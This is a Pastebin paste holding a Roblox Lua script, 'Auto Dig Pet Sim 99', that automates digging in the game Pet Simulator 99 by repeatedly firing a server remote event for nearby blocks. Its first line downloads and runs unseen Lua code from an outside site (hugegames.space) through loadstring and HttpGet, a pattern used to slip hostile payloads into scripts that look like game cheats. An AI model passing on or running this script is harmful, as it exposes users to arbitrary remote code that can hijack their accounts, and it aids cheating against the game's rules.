Advertisement
Guest User

Auto Dig Pet Sim 99

a guest
Apr 13th, 2024
469
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.65 KB | None | 0 0
  1. loadstring(game:HttpGet('https://hugegames.space/43ada32876a581f4c4a6d7ce.lua'))()
  2. spawn(function()
  3. while wait() do
  4. for i,v in pairs(workspace.__THINGS.__INSTANCE_CONTAINER.Active.Digsite.Important.ActiveBlocks:GetChildren()) do
  5. if v.Name == "Part" and (v.Position and (game.Players.LocalPlayer.Character.HumanoidRootPart.Position - v.Position).magnitude < 15) then
  6. for i = 1, 5 do
  7. local args = {
  8. [1] = "Digsite",
  9. [2] = "DigBlock",
  10. [3] = v:GetAttribute('Coord')
  11. }
  12.  
  13. game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Instancing_FireCustomFromClient"):FireServer(unpack(args))
  14. end
  15. wait(0.1)
  16. break
  17. end
  18. end
  19. end
  20. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement